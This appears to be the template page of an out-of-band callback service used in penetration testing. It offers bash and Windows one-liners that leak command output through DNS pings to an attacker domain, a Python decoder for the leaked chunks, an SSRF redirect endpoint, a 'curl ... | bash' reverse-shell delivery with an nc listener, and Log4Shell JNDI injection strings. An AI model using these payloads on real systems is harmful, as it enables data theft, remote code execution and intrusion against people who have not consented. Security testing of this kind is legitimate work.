# | Type | Record | IP | req_body | Time |
---|---|---|---|---|---|
{{ index }} | {{ record.type }} | {{ record.subdomain }} | {{ record.ip }} | {{ record.reqbody }} | {{ record.time }} |
Linux/bash: hex-encode the command output and leak it as DNS labels of at most 63 chars (the label limit), one ping per chunk, with the chunk index and a 4-char random run tag in the name. Needs hexdump; where it is missing, `xxd -p | tr -d '\n'` produces the same hex string.
CMD="your command here";RExSP="$(eval "$CMD"|hexdump -v -e '/1 "%02X"')";R=$(tr -dc 'a-z0-9' </dev/urandom | head -c 4);i=0;for s in $(echo "$RExSP"|fold -w 63);do i=$((i+1));ping -c 1 "$s.$i.$R.cmd.{{domain}}">/dev/null;done
Windows/cmd, typed at an interactive prompt (inside a .bat file the for variables must be doubled, %%a): certutil hex-encodes the output file as 16 space-separated bytes per line, findstr /n numbers the lines from 1, and each line becomes one 32-char label. %RANDOM% is expanded once when the line is parsed, so it serves as the per-run tag.
your command here 1> execfile7 && certutil -encodehex -f execfile7 execfile7.txt 4 && (for /f "Delims=: Tokens=1-2" %a in ('findstr /n . execfile7.txt') do (for /f "Tokens=1-16" %c in ('echo %b') do ping -n 1 %c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r.%a.%RANDOM%.cmd.{{domain}})) && del execfile7 && del execfile7.txt
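Decoding what arrives: the records table shows one query per chunk, and they turn up out of order or duplicated when ping retries or a resolver re-asks. The Python below is an added example, not part of callback.red or of the two payloads; it reassembles both label layouts (bash: uppercase hex folded at 63 chars, so a byte can straddle two labels; cmd: 16 lowercase bytes per label) by grouping on the run tag, sorting on the index and hex-decoding the joined string. `example.com` stands in for the {{domain}} placeholder, and `simulate_sender` only reproduces the names the bash one-liner would resolve so that the file runs offline on constructed data.

```python
"""Reassemble command output leaked by the ping one-liners above.

Each query is <hex>.<index>.<tag>.cmd.<domain>: <hex> is a slice of the
hex-encoded output (the bash version folds at 63 chars, the DNS label
limit; the cmd version sends 16 bytes = 32 chars per line), <index> is the
1-based slice number and <tag> is the per-run random token ($R / %RANDOM%).
Added example, not part of callback.red; 'example.com' stands in for the
{{domain}} placeholder.
"""
import re
from collections import defaultdict

# <hex>.<index>.<tag>, matched after the ".cmd.<domain>" suffix is stripped
SLICE_RE = re.compile(r"^([0-9a-f]+)\.(\d+)\.([a-z0-9]+)$")


def simulate_sender(output: bytes, tag: str, domain: str, width: int = 63) -> list:
    """Names the bash payload would resolve for `output` (test fixture only).

    63 is odd, so with more than one slice a byte straddles two labels:
    decoding label by label would fail, decoding the joined string works.
    """
    hexstr = output.hex().upper()          # hexdump -e '/1 "%02X"' is uppercase
    slices = [hexstr[i:i + width] for i in range(0, len(hexstr), width)]
    return [f"{s}.{n}.{tag}.cmd.{domain}" for n, s in enumerate(slices, 1)]


def reassemble(queries, domain: str) -> dict:
    """Return {tag: decoded bytes} for every complete run in `queries`.

    Order is irrelevant and exact duplicates (resolver retries) are ignored.
    A run with a gap raises instead of decoding, because a missing slice
    would shift every following byte. A lost *last* slice is undetectable:
    neither payload sends a length or a terminator.
    """
    suffix = ".cmd." + domain.lower()
    runs = defaultdict(dict)
    for q in queries:
        name = q.rstrip(".").lower()        # DNS is case-insensitive (0x20 randomisation)
        if not name.endswith(suffix):
            continue                        # unrelated query
        m = SLICE_RE.match(name[: -len(suffix)])
        if not m:
            continue
        chunk, idx, tag = m.group(1), int(m.group(2)), m.group(3)
        seen = runs[tag].get(idx)
        if seen is not None and seen != chunk:
            raise ValueError(f"run {tag}: conflicting data for slice {idx}")
        runs[tag][idx] = chunk
    out = {}
    for tag, slices in runs.items():
        missing = [i for i in range(1, max(slices) + 1) if i not in slices]
        if missing:
            raise ValueError(f"run {tag}: missing slices {missing}")
        out[tag] = bytes.fromhex("".join(slices[i] for i in sorted(slices)))
    return out


if __name__ == "__main__":
    # constructed sample: what `id` might print on the victim, 60 bytes -> 120 hex chars
    sample = b"uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)\n"
    names = simulate_sender(sample, "k7x2", "example.com")
    arrived = [names[1], names[0], names[1], "www.example.com"]  # reordered, one retry, noise
    for tag, data in reassemble(arrived, "example.com").items():
        print(tag, data.decode())
```

Feed it the Record column of the table (everything before `.cmd.<domain>` is what the regex consumes); a run that only ever shows a single query with a short label is probably complete, while a run whose highest index has a full-length label may have lost its tail.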
{{ record.content }}
callback.red/ssrf/10.10.1.1/  (answers with a 302 to the given host, for targets that only fetch allow-listed domains but follow redirects)
=> $ curl -v callback.red/ssrf/10.10.1.1/
< HTTP/1.1 302 Found
< Server: nginx/1.20.1
< Date: Sun, 16 Jan 2022 15:41:36 GMT
< Content-Type: text/html;charset=utf-8
< Content-Length: 0
< Connection: keep-alive
< Cache-Control: must-revalidate, no-store
< Location: http://10.10.1.1/
callback.red/sh4ll/ip:port  (serves a reverse-shell script that connects back to ip:port)
Victim machine:
=> $ curl callback.red/sh4ll/1.2.3.4:1234 | bash
   or
   $ curl callback.red/sh4ll/1.2.3.4:1234 | sh
Your VPS:
=> $ nc -lvvp 1234
listening on [any] 1234 ...
connect to [1.2.3.4] from fbi.gov [127.0.0.1] 46958
rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/
ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/
Anything (or nothing) may be appended after the path to tell individual callbacks apart, e.g.:
${jndi:ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/test}
${jndi:rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/hello}